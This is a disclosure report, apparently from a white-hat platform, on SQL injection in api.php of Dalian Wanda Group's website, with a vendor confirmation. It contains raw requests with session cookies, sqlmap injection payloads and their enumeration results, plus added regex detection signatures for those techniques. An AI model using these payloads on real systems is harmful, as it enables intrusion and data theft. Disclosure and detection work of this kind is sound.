2015-08-06: Details sent to the vendor, awaiting the vendor's handling
2015-08-06: Vendor confirmed; details disclosed to the vendor only
2015-08-16: Details disclosed to core white hats and experts in related fields
2015-08-26: Details disclosed to ordinary white hats
2015-09-05: Details disclosed to intern white hats
2015-09-20: Details disclosed to the public

Two POST-type SQL injections on the official website of Dalian Wanda Group Co., Ltd. (bundled report)

Packet 1:
POST /api.php?op=feedback HTTP/1.1
Content-Length: 93
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.wanda.cn/
Cookie: WANDACNSESSID=8rurvpb9rhelnotj6kvh6e1ad1; HMVT=cd44f738169a36ff869eee3ca6afb9b1|1438496238|; HMACCOUNT=2C9F94FD6DF138AC; Hm_lvt_cd44f738169a36ff869eee3ca6afb9b1=1438496681,1438496688,1438496718,1438496738; Hm_lpvt_cd44f738169a36ff869eee3ca6afb9b1=1438496738; __utmt=1; __utma=41079204.802376289.1438495914.1438495914.1438495914.1; __utmb=41079204.1.10.1438495914; __utmc=41079204; __utmz=41079204.1438495914.1.1.utmcsr=acunetix-referrer.com|utmccn=(referral)|utmcmd=referral|utmcct=/javascript:domxssExecutionSink(0,"'\"><xsstag>()refdxss"); BAIDUID=BF1A957F41EF89BAFA6A6BE08083EEC2:FG=1; CNZZDATA5891341=cnzz_eid%3D136358418-1438494730-http%253A%252F%252Fwww.acunetix-referrer.com%252F%26ntime%3D1438494730
Host: www.wanda.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

City=1169&DictionaryID=LY&type=GetProJectList
Packet 2:
POST /api.php?op=feedback HTTP/1.1
Content-Length: 68
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.wanda.cn/
Cookie: WANDACNSESSID=8rurvpb9rhelnotj6kvh6e1ad1; HMVT=cd44f738169a36ff869eee3ca6afb9b1|1438496238|; HMACCOUNT=2C9F94FD6DF138AC; Hm_lvt_cd44f738169a36ff869eee3ca6afb9b1=1438496681,1438496688,1438496718,1438496738; Hm_lpvt_cd44f738169a36ff869eee3ca6afb9b1=1438496738; __utmt=1; __utma=41079204.802376289.1438495914.1438495914.1438495914.1; __utmb=41079204.1.10.1438495914; __utmc=41079204; __utmz=41079204.1438495914.1.1.utmcsr=acunetix-referrer.com|utmccn=(referral)|utmcmd=referral|utmcct=/javascript:domxssExecutionSink(0,"'\"><xsstag>()refdxss"); BAIDUID=BF1A957F41EF89BAFA6A6BE08083EEC2:FG=1; CNZZDATA5891341=cnzz_eid%3D136358418-1438494730-http%253A%252F%252Fwww.acunetix-referrer.com%252F%26ntime%3D1438494730
Host: www.wanda.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

Province=fWqPza1t&type=getCity
Screenshots are too much hassle, so I'll just paste the sqlmap logs directly.

Log 1:
sqlmap identified the following injection point(s) with a total of 40 HTTP(s) requests:
---
Parameter: DictionaryID (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: City=1169&DictionaryID=LY' AND 3158=3158 AND 'hNyR'='hNyR&type=GetProJectList

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: City=1169&DictionaryID=LY';WAITFOR DELAY '0:0:5'--&type=GetProJectList

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: City=1169&DictionaryID=LY' UNION ALL SELECT CHAR(113)+CHAR(122)+CHAR(98)+CHAR(113)+CHAR(113)+CHAR(108)+CHAR(76)+CHAR(108)+CHAR(120)+CHAR(85)+CHAR(66)+CHAR(106)+CHAR(68)+CHAR(70)+CHAR(119)+CHAR(113)+CHAR(106)+CHAR(118)+CHAR(112)+CHAR(113),NULL-- &type=GetProJectList
---
web application technology: Nginx, PHP 5.3.25
back-end DBMS: Microsoft SQL Server 2008
current user: 'ksfw_user'

sqlmap resumed the following injection point(s) from stored session:
(same injection point as above)
web application technology: Nginx, PHP 5.3.25
back-end DBMS: Microsoft SQL Server 2008
current database: 'ksfw'

sqlmap resumed the following injection point(s) from stored session:
(same injection point as above)
web application technology: Nginx, PHP 5.3.25
back-end DBMS: Microsoft SQL Server 2008
Database: ksfw
[267 tables]
(table name list omitted)
Log 2:

sqlmap identified the following injection point(s) with a total of 58 HTTP(s) requests:
---
Parameter: Province (POST)
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: Province=fWqPza1t';WAITFOR DELAY '0:0:5'--&type=getCity

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: Province=fWqPza1t' UNION ALL SELECT CHAR(113)+CHAR(120)+CHAR(120)+CHAR(106)+CHAR(113)+CHAR(110)+CHAR(110)+CHAR(89)+CHAR(83)+CHAR(65)+CHAR(83)+CHAR(106)+CHAR(86)+CHAR(112)+CHAR(66)+CHAR(113)+CHAR(98)+CHAR(118)+CHAR(98)+CHAR(113),NULL-- &type=getCity
---
web application technology: Nginx, PHP 5.3.25
back-end DBMS: Microsoft SQL Server 2008
current user: 'ksfw_user'

sqlmap resumed the following injection point(s) from stored session:
(same injection point as above)
web application technology: Nginx, PHP 5.3.25
back-end DBMS: Microsoft SQL Server 2008
current database: 'ksfw'

sqlmap resumed the following injection point(s) from stored session:
(same injection point as above)
web application technology: Nginx, PHP 5.3.25
back-end DBMS: Microsoft SQL Server 2008
Database: ksfw
[267 tables]
(table name list omitted)
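As an added defender-side example (not part of the original report), the Python below checks form-encoded POST bodies for the three injection techniques sqlmap reported against api.php above: boolean-based blind, MSSQL stacked queries via WAITFOR DELAY, and UNION SELECT. The signature patterns and the sample request list are constructed for this example; the sample bodies are the ones from the report, with the UNION CHAR() chain shortened.

```python
import re
from urllib.parse import unquote_plus

# Signatures for the three techniques sqlmap reported above. These are
# hypothetical patterns written for this example; tune them before real use.
SIGNATURES = {
    "boolean-based blind": re.compile(r"'\s*(?:AND|OR)\s+\d+\s*=\s*\d+", re.I),
    "stacked queries": re.compile(r";\s*WAITFOR\s+DELAY\s+'", re.I),
    "UNION query": re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I),
}


def parse_body(body: str) -> dict:
    """Split an application/x-www-form-urlencoded body on '&' only.

    Splitting by hand instead of using parse_qs keeps ';' inside a value,
    which older Python versions would otherwise treat as a separator and
    so hide the stacked-query payload.
    """
    params = {}
    for pair in body.split("&"):
        key, _, value = pair.partition("=")
        params[unquote_plus(key)] = unquote_plus(value)
    return params


def classify_body(body: str) -> dict:
    """Return {parameter: [technique, ...]} for values matching a signature."""
    hits = {}
    for key, value in parse_body(body).items():
        matched = [name for name, rx in SIGNATURES.items() if rx.search(value)]
        if matched:
            hits[key] = matched
    return hits


def scan_requests(requests):
    """Return [(path, {param: techniques})] for every flagged (path, body)."""
    flagged = []
    for path, body in requests:
        hits = classify_body(body)
        if hits:
            flagged.append((path, hits))
    return flagged


# Constructed sample input: one benign body plus the report's sqlmap bodies.
SAMPLE_REQUESTS = [
    ("/api.php?op=feedback", "City=1169&DictionaryID=LY&type=GetProJectList"),
    ("/api.php?op=feedback",
     "City=1169&DictionaryID=LY' AND 3158=3158 AND 'hNyR'='hNyR&type=GetProJectList"),
    ("/api.php?op=feedback", "Province=fWqPza1t';WAITFOR DELAY '0:0:5'--&type=getCity"),
    ("/api.php?op=feedback",
     "Province=fWqPza1t' UNION ALL SELECT CHAR(113)+CHAR(120),NULL-- &type=getCity"),
]

if __name__ == "__main__":
    for path, hits in scan_requests(SAMPLE_REQUESTS):
        print(path, hits)
```

Signature matching of this kind is a triage aid for request logs or a WAF rule review, not a substitute for parameterised queries in api.php.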
I won't go any further than this; the logs make it clear enough.

Three injections in a single api.php, I'm speechless. The experts are at Wanda, you understand this better than I do...

Severity: High

Vulnerability Rank: 12

Confirmed at: 2015-08-06 16:47

Thanks to 百度流氓 for the continued attention and contributions! We will notify the business unit to fix this right away!